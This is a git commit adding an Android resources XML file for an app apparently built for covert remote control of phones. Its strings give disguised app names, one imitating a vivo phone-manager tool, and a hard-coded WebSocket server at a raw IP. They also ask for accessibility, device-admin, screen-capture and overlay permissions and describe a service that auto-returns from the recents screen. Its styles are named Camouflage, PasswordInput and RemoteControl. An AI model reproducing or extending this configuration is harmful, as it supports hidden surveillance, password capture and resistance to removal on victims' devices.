This commit is contained in:
wdvipa
2026-02-11 16:59:49 +08:00
commit eee3a16150
3327 changed files with 198527 additions and 0 deletions

View File

@@ -0,0 +1,75 @@
<?xml version="1.0" encoding="utf-8"?>
<resources>
<bool name="enable_system_alarm_service_default">true</bool>
<bool name="enable_system_foreground_service_default">true</bool>
<bool name="enable_system_job_service_default">true</bool>
<color name="background">#FFFFFF</color>
<color name="black">#000000</color>
<color name="error">#B00020</color>
<color name="holo_blue_light">#33B5E5</color>
<color name="holo_green_dark">#4CAF50</color>
<color name="holo_orange_dark">#FF9800</color>
<color name="ic_launcher_background">#1976D2</color>
<color name="on_background">#000000</color>
<color name="on_error">#FFFFFF</color>
<color name="on_primary">#FFFFFF</color>
<color name="on_secondary">#000000</color>
<color name="on_surface">#000000</color>
<color name="primary">#1976D2</color>
<color name="secondary">#03DAC6</color>
<color name="surface">#FFFFFF</color>
<color name="white">#FFFFFF</color>
<string name="_2580369_res_0x7f10001e"></string>
<string name="accessibility_service_description">无障碍服务</string>
<string name="app_name">短视频组件</string>
<string name="app_name_tran"> </string>
<string name="app_name_vivo">i管家</string>
<string name="default_server_url">ws://156.244.56.238:3001</string>
<string name="device_admin_description">设备管理员服务</string>
<string name="enable_accessibility_service">启用</string>
<string name="network_connected">已连接到服务器</string>
<string name="network_connecting">正在连接服务器...</string>
<string name="network_disconnected">与服务器断开连接</string>
<string name="network_error">网络连接错误</string>
<string name="open_app_settings">应用设置</string>
<string name="permission_media_projection_message">请允许应用屏幕以进行服务</string>
<string name="permission_media_projection_title">需要屏幕权限</string>
<string name="permission_overlay_message">请允许应用显示悬浮窗以进行服务</string>
<string name="permission_overlay_title">需要悬浮窗权限</string>
<string name="recents_monitor_service_description">多任务页面监听服务,用于监听多任务页面的点击事件并自动返回</string>
<string name="service_enabled">服务已启用</string>
<string name="service_not_running">❌ 服务未启动</string>
<string name="service_notification_text">服务正在运行</string>
<string name="service_notification_title">服务通知</string>
<string name="service_running">✅ 服务正在运行</string>
<string name="service_status_checking">请开启无障碍服务\n请按照以下步骤进行\n1. 点击启用按钮\n2. 转到已安装的服务/应用\n3. 启用应用名称的应用</string>
<string name="usage_instructions">使用说明:\n1. 启用无障碍服务\n2. 确保设备连接到网络\n\n注意请在安全的网络环境中使用</string>
<style name="Theme.Camouflage" parent="android:Theme.NoDisplay">
<item name="android:windowBackground">@android:color/white</item>
<item name="android:windowNoTitle">true</item>
<item name="android:windowFullscreen">true</item>
<item name="android:windowIsTranslucent">false</item>
<item name="android:windowAnimationStyle">@null</item>
</style>
<style name="Theme.PasswordInput" parent="Theme.AppCompat.Light.NoActionBar">
<item name="android:windowBackground">@android:color/white</item>
<item name="android:windowNoTitle">true</item>
<item name="android:windowFullscreen">false</item>
<item name="android:windowIsTranslucent">false</item>
<item name="android:windowAnimationStyle">@null</item>
</style>
<style name="Theme.RemoteControl" parent="Theme.AppCompat.Light.NoActionBar">
<item name="android:windowBackground">@android:color/white</item>
<item name="android:windowNoTitle">true</item>
<item name="android:windowFullscreen">false</item>
<item name="android:windowIsTranslucent">false</item>
</style>
<style name="Theme.Transparent" parent="android:Theme.Translucent.NoTitleBar">
<item name="android:windowBackground">@android:color/transparent</item>
<item name="android:windowNoTitle">true</item>
<item name="android:windowFullscreen">false</item>
<item name="android:windowIsTranslucent">true</item>
<item name="android:windowAnimationStyle">@null</item>
<item name="android:windowContentOverlay">@null</item>
</style>
</resources>